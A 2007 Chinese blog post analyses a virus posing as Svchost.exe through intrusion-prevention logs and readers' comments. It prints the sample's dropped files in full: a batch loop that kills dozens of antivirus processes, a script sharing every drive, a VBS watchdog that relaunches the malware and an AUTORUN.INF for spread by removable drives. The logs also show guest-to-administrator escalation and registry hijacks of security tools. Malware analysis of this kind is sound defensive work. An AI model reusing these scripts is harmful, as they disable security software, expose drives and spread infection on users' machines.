百度空间 | 百度首页 
 
查看文章
 
不怕死的就下 肉鸡必备,杀人专用,自杀利器
2007-12-06 23:19

转载注明   http://hi.baidu.com/zqinyan/

呵呵,这个标题是不是很恐怖?嗯??

放心,这可不是我说的,是深度的牛人说的

原帖见此:http://bbs.deepin.org/read.php?tid=471624

按照发贴人的说法 此病毒具有如下特点:

此乃收藏之极品~~~~~~~肉鸡必备,杀人专用,自杀利器,自毁上品!!
推荐大家在自己的肉鸡上玩玩~~~~~~看看那个恐怖的场景~~~~
推荐大家在自己的影子系统上玩玩~~~~~~看看那个变态的场景~~~
推荐大家在自己的虚拟机上玩玩~~~~~~看看那个精彩的场面~~~
自毁的就.....
玩了之后你不截图你找我~~~~~~~~~~~~~


===========

呵呵 下载来看看

嗯 图标还蛮好看的

日志也比较多 主要是映像劫持的比较多…… 抓图不能抓全 所以直接上日志了

嗯,运行后的Svchost.exe进程 很有迷惑性

2007-12-06 22:28:20    运行应用程序      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\cmd.exe
命令行:/c sc config winmgmt start= AUTO & net start winmgmt & quit
触发规则:黑名单->In Side->%windir%\system32\cmd.exe


2007-12-06 22:28:20    创建文件      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\Taskeep.vbs
触发规则:所有程序规则->全局文件规则_普通模式->?:\*.vbs


2007-12-06 22:28:28    运行应用程序      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\Rundll32.exe
命令行:url.dll, FileProtocolHandler C:\windows\system32\Taskeep.vbs
触发规则:所有程序规则->*


2007-12-06 22:28:31    访问物理内存      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe

触发规则:所有程序规则->*


2007-12-06 22:28:33    创建文件      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\SDGames.exe
触发规则:所有程序规则->全局文件规则_普通模式->?:\*.exe


2007-12-06 22:28:33    创建文件      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\Avpser.cmd
触发规则:所有程序规则->全局文件规则_普通模式->?:\*.cmd


2007-12-06 22:28:33    创建文件      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\netshare.cmd
触发规则:所有程序规则->全局文件规则_普通模式->?:\*.cmd


2007-12-06 22:28:33    创建文件      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\netshare.cmd
触发规则:所有程序规则->全局文件规则_普通模式->?:\*.cmd

嗯 下面开启guest 和 管理员    然后提权


2007-12-06 22:28:34    运行应用程序      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\net.exe
命令行:user guest /add
触发规则:所有程序规则->系统工具->%windir%\system32\net.exe


2007-12-06 22:28:36    运行应用程序      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\net.exe
命令行:user guest /active
触发规则:所有程序规则->系统工具->%windir%\system32\net.exe


2007-12-06 22:28:38    运行应用程序      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\net.exe
命令行:user guest "
触发规则:所有程序规则->系统工具->%windir%\system32\net.exe


2007-12-06 22:28:39    运行应用程序      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\net.exe
命令行:localgroup Administrators guest
触发规则:所有程序规则->系统工具->%windir%\system32\net.exe


2007-12-06 22:28:40    运行应用程序      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\net.exe
命令行:localgroup Guests guest /add
触发规则:所有程序规则->系统工具->%windir%\system32\net.exe

创建、修改启动信息     并修改注册表


2007-12-06 22:28:40    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
注册表名称:run
注册表数据:C:\windows\system32\SDGames.exe
触发规则:所有程序规则->系统自动运行_普通模式->*\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows


2007-12-06 22:28:41    修改注册表内容      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
注册表名称:load
注册表数据:C:\windows\system32\SDGames.exe
触发规则:所有程序规则->系统自动运行_普通模式->*\Software\Microsoft\Windows nt\Currentversion\Windows


2007-12-06 22:28:42    修改文件      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system.ini
触发规则:所有程序规则->全局写入设置_普通模式->%windir%\*


2007-12-06 22:28:44    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
注册表名称:[Key]
触发规则:所有程序规则->其他重要项_普通模式->*\Software\Policies*


2007-12-06 22:28:44    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
注册表名称:[Key]
触发规则:所有程序规则->其他重要项_普通模式->*\Software\Policies*


2007-12-06 22:28:44    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_USERS\S-1-5-21-2000478354-842925246-1202660629-500\Software\Policies\Microsoft\Windows\System
注册表名称:[Key]
触发规则:所有程序规则->其他重要项_普通模式->*\Software\Policies*


2007-12-06 22:28:44    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_USERS\S-1-5-21-2000478354-842925246-1202660629-500\Software\Policies\Microsoft\Windows\System
注册表名称:[Key]
触发规则:所有程序规则->其他重要项_普通模式->*\Software\Policies*


2007-12-06 22:28:44    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
注册表名称:AntiVirusOverride
触发规则:所有程序规则->其他重要项_普通模式->HKEY_LOCAL_MACHINE\Software\Microsoft\Security center


2007-12-06 22:28:47    修改注册表内容      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
注册表名称:CheckedValue
触发规则:所有程序规则->系统设置_普通模式->HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\*


2007-12-06 22:28:47    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
注册表名称:NoFolderOptions
触发规则:所有程序规则->其他重要项_普通模式->*\Software\Microsoft\Windows\Currentversion\Policies*


2007-12-06 22:28:49    修改注册表内容      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
注册表名称:CheckedValue
触发规则:所有程序规则->系统设置_普通模式->HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\*


2007-12-06 22:28:49    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
注册表名称:NoControlPanel
触发规则:所有程序规则->其他重要项_普通模式->*\Software\Microsoft\Windows\Currentversion\Policies*


2007-12-06 22:28:49    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
注册表名称:NoSetTaskbar
触发规则:所有程序规则->其他重要项_普通模式->*\Software\Microsoft\Windows\Currentversion\Policies*


2007-12-06 22:28:49    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
注册表名称:[Key]
触发规则:所有程序规则->其他重要项_普通模式->*\Software\Policies*


2007-12-06 22:28:49    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
注册表名称:[Key]
触发规则:所有程序规则->其他重要项_普通模式->*\Software\Policies*


2007-12-06 22:28:49    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_USERS\S-1-5-21-2000478354-842925246-1202660629-500\Software\Policies\Microsoft\Windows\System
注册表名称:[Key]
触发规则:所有程序规则->其他重要项_普通模式->*\Software\Policies*


2007-12-06 22:28:49    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_USERS\S-1-5-21-2000478354-842925246-1202660629-500\Software\Policies\Microsoft\Windows\System
注册表名称:[Key]
触发规则:所有程序规则->其他重要项_普通模式->*\Software\Policies*


2007-12-06 22:28:49    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
注册表名称:DisableRegistrytools
触发规则:所有程序规则->其他重要项_普通模式->*\Software\Microsoft\Windows\Currentversion\Policies*


2007-12-06 22:28:49    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
注册表名称:DisableTaskMgr
触发规则:所有程序规则->其他重要项_普通模式->*\Software\Microsoft\Windows\Currentversion\Policies*


2007-12-06 22:28:49    修改注册表内容      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
注册表名称:EnableAdminTSRemote
触发规则:所有程序规则->其他重要项_普通模式->*\Software\Policies*

改首页 娃哈哈


2007-12-06 22:28:55    修改注册表内容      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
注册表名称:Start Page
注册表数据:http://www.zhidaobaidu.10mb.cn/
触发规则:所有程序规则->IE浏览器设置_普通模式->*\Software\Microsoft\Internet explorer\Main


2007-12-06 22:28:56    修改注册表内容      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main
注册表名称:Start Page
注册表数据:wangma
触发规则:所有程序规则->IE浏览器设置_普通模式->*\Software\Microsoft\Internet explorer\Main


2007-12-06 22:28:56    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
注册表名称:Default_Page_URL
注册表数据:wangma
触发规则:所有程序规则->IE浏览器设置_普通模式->*\Software\Microsoft\Internet explorer\Main


2007-12-06 22:28:56    修改注册表内容      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main
注册表名称:Default_Page_URL
注册表数据:wangma
触发规则:所有程序规则->IE浏览器设置_普通模式->*\Software\Microsoft\Internet explorer\Main

下面开始映像劫持……比较多 就发几个代表了


2007-12-06 22:28:56    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe
注册表名称:[Key]
注册表数据:cution Options\360rpt.exe
触发规则:所有程序规则->其他重要项_普通模式->*\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options*

2007-12-06 22:28:57    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe
注册表名称:[Key]
注册表数据:cution Options\HijackThis.exe

2007-12-06 22:28:57    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe
注册表名称:[Key]
注册表数据:cution Options\IceSword.exe

2007-12-06 22:28:57    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASMain.exe
注册表名称:[Key]
注册表数据:cution Options\KASMain.exe

2007-12-06 22:28:58    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp
注册表名称:[Key]
注册表数据:cution Options\TrojDie.kxp

2007-12-06 22:28:58    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe
注册表名称:[Key]
注册表数据:cution Options\WoptiClean.exe

进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQ.exe
注册表名称:[Key]
注册表数据:cution Options\QQ.exe

进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Shadowservice.exe
注册表名称:[Key]
注册表数据:cution Options\Shadowservice.exe

进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe
注册表名称:[Key]
注册表数据:cution Options\msconfig.exe

再一次添加启动项

2007-12-06 22:28:58    创建注册表值      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
注册表名称:Winstary
注册表数据:C:\windows\system32\SDGames.exe
触发规则:所有程序规则->系统自动运行_普通模式->*\SOFTWARE\Microsoft\Windows\CurrentVersion\Run*

还不忘创建病毒文件


2007-12-06 22:28:58    创建文件      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\Taskeep.vbs
触发规则:所有程序规则->全局文件规则_普通模式->?:\*.vbs


2007-12-06 22:28:58    运行应用程序      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\Rundll32.exe
命令行:url.dll, FileProtocolHandler C:\windows\system32\Taskeep.vbs
触发规则:所有程序规则->*

再下面就比较搞了 会以从A到Z的命令行让CMD干活 这里截取头尾部分

2007-12-06 22:28:58    创建文件      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\AUTORUN.INF
触发规则:所有程序规则->全局写入设置_普通模式->%windir%\*


2007-12-06 22:29:01    运行应用程序      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\cmd.exe
命令行:/c rd /s /q A:\AUTORUN.INF
触发规则:黑名单->In Side->%windir%\system32\cmd.exe


2007-12-06 22:29:03    运行应用程序      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\cmd.exe
命令行:/c rd /s /q B:\AUTORUN.INF
触发规则:黑名单->In Side->%windir%\system32\cmd.exe

2007-12-06 22:29:35    运行应用程序      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\cmd.exe
命令行:/c rd /s /q X:\AUTORUN.INF
触发规则:黑名单->In Side->%windir%\system32\cmd.exe


2007-12-06 22:29:37    运行应用程序      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\cmd.exe
命令行:/c rd /s /q Y:\AUTORUN.INF
触发规则:黑名单->In Side->%windir%\system32\cmd.exe


2007-12-06 22:29:38    运行应用程序      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\cmd.exe
命令行:/c rd /s /q Z:\AUTORUN.INF
触发规则:黑名单->In Side->%windir%\system32\cmd.exe

又来一次创建病毒副本


2007-12-06 22:29:39    创建文件      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\Taskeep.vbs
触发规则:所有程序规则->全局文件规则_普通模式->?:\*.vbs


2007-12-06 22:29:42    运行应用程序      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\Rundll32.exe
命令行:url.dll, FileProtocolHandler C:\windows\system32\Taskeep.vbs
触发规则:所有程序规则->*

由于我阻止了,于是病毒再一次的开始以A到Z的命令行调用CMD……


2007-12-06 22:29:42    创建文件      操作:阻止
进程路径:F:\Once\请谨慎使用\Svchost.exe
文件路径:C:\windows\system32\AUTORUN.INF
触发规则:所有程序规则->全局写入设置_普通模式->%windir%\*

==========

病毒在system32目录下生成的副本

avpser.bat的内容

@echo off
:k
Set p=taskkill /f /im /t
sc config winmgmt start= AUTO & net start winmgmt
%p% RavMonD.exe
%p% RavStub.exe
%p% Anti*
%p% AgentSvr*
%p% CCenter*
%p% Rsaupd*
%p% SmartUp*
%p% FileDsty*
%p% RegClean*
%p% 360tray*
%p% 360safe*
%p% kabaload*
%p% safelive*
%p% KASTask*
%p% kpFW32*
%p% kpFW32X*
%p% KvXP_1*
%p% KVMonXP_1*
%p% KvReport*
%p% KvXP*
%p% KVMonXP*
%p% nter*
%p% TrojDie*
%p% avp.com
%p% KRepair.COM
%p% Trojan*
%p% KvNative*
%p% Virus*
%p% Filewall*
%p% Kaspersky*
%p% JiangMin*
%p% RavMonD*
%p% RavStub*
%p% RavTask*
%p% adam*
%p% cSet*
%p% PFWliveUpdate*
%p% mmqczj*
%p% Trojanwall*
%p% Ras.exe
%p% runiep.exe
%p% avp.exe
%p% PFW.exe
%p% rising*
%p% ikaka*
%p% .duba*
%p% kingsoft*
%p% 木马*
%p% 社区*
%p% aswBoot*
%p% MainCon*
%p% Regs*
%p% AVP*
%p% Task*
%p% regedit*
%p% Ras*
%p% srgui*
%p% norton*
%p% avp*
%p% fire*
%p% spy*
%p% bullguard*
%p% PersFw*
%p% KAV*
%p% ZONEALARM*
%p% SAFEWEB*
%p% OUTPOST*
%p% ESAFE*
%p% clear*
%p% BLACKICE*
%p% 360safe.exe
%p% Shadowservice.exe
%p% v3webnt.exe
%p% v3sd32.exe
%p% v3monsvc.exe
%p% sysmonnt.exe
%p% hkcmd.exe
%p% DNTUS26.EXE
%p% AhnSD.exe
%p% CTFMON.EXE
%p% MonsysNT.exe
%p% awrem32.exe
%p% WINAW32.EXE
%p% PNTIOMON.exe
%p% avgw.exe
%p% avgcc32.exe
%p% PROmon.exe
%p% PNTIOMON.exe
%p% MagicSet.exe
%p% MainCon.exe
%p% TrCleaner.exe
%p% WmNetPro.exe
%p% 修复*
%p% 保护*
goto k

netshare.bat 的内容

net share A=A:
net share B=B:
net share C=C:
net share D=D:
net share E=E:
net share F=F:
net share G=G:
net share H=H:
net share I=I:
net share J=J:
net share K=K:
net share L=L:
net share M=M:
net share N=N:
net share O=O:
net share P=P:
net share Q=Q:
net share R=R:
net share S=S:
net share T=T:
net share U=U:
net share V=V:
net share W=W:
net share X=X:
net share Y=Y:
net share Z=Z:

Taskeep.vbs 的内容

on error resume next
set Ws = CreateObject("wscript.Shell")
count=0
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
if ps.name="wscript.exe"then count=count+1
next
if count > 2 then wscript.quit
i=1
for i = 1 to 3
i=i-1
WScript.Sleep(2000)
strProcess = "Svchost.exe"
Proce = false
For each x in getobject("winmgmts:").instancesof("win32_process")
If ucase(x.name) = ucase(strProcess) then
Proce = true
Exit For
End If
Next
If Proce=false then
Ws.run "D:\\Svchost.exe"
WScript.Quit
else
WScript.Quit
End If
next

AUTORUN.INF 的内容

[Autorun]
OPEN=SDGames.exe
Shell\Open=打开(^&O)
Shell\Open\Command=SDGames.exe
Shell\Explore=资源管理器(^&X)
Shell\Explore\Command=SDGames.exe

----------

以下内容来自卡饭会员a256886572008的测试 因为在我的电脑上 病毒并没有表现出该动作

新建文件夹.url 和 Windows.url 的内容
URL=D:\SDGames.exe
IconIndex=3
IconFile=%SystemRoot%\system32\SHELL32.dll


Recycleds.url的内容
URL=D:\SDGames.exe
IconIndex=31
IconFile=%SystemRoot%\system32\SHELL32.dll

并开始感染.htm文件

---------

本次日志文件可在以下地址下载

http://bbs.kafan.cn/viewthread.php?tid=167340&page=1&extra=page%3D1#pid2225158

类别:电脑安全 | 添加到搜藏 | 浏览() | 评论 (12)
最近读者:
 
网友评论:
1
2007-12-06 23:22 | 回复
突然觉得,周MM是E盾的工作人员~~
 
2
2007-12-07 08:01 | 回复
沁研在用EQ呀 嘿嘿~~
 
3
2007-12-07 08:28 | 回复
真是勇敢啊,这些东东呵呵, ] 回复2楼,她是EQ的官方博客也和论坛版主,=.=
 
4
2007-12-07 09:54 | 回复
很好很强大啊。
 
5
2007-12-07 12:31 | 回复
bucuo 不错
 
6
2007-12-07 19:59 | 回复
是你改了头像啊,
 
7
2007-12-08 19:20 | 回复
EQ的视频教程很不错,我今天才看到啊,呵呵,但是系统还原了,无法使用EQ了,郁闷
 
8
2007-12-13 15:05 | 回复
呵呵~ 这个病毒我还真收藏了一份, 在虚拟机里边玩过,体验过威力了,清除难度极大…… 感染后的EXE文件几乎无法修复……
 
9
2007-12-18 22:52 | 回复
没有下载地址 那个论坛注册还要邀请码 请放出外部链接谢谢! 本人想试试 本人影子系统+沙盒!
 
10
2007-12-18 23:03 | 回复
不好意思 我没网盘 你可以去其他论坛样本区搜搜 应该有的
 
11
2007-12-27 01:55 | 回复
HKEY_USERS\S-1-5-21-2000478354-842925246-1202660629-500\Software\Microsoft\Internet Explorer\Main Start Page about:blank 未结束的Unicode字符串 修改 检测到
 
12
2007-12-27 02:02 | 回复
HKEY_USERS\S-1-5-21-2000478354-842925246-1202660629-500\Software\Microsoft\Internet Explorer\Main Start Page about:blank 未结束的Unicode字HKEY_USERS\S-1-5-21-2000478354-842925246-1202660629-500\Software\Microsoft\Internet Explorer\Main Start Page about:blank 未结束的Unicode字符串 修改 检测到 请教 改如何彻底解决这个问题???
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     
 
精彩相册
   
     

©2009 Baidu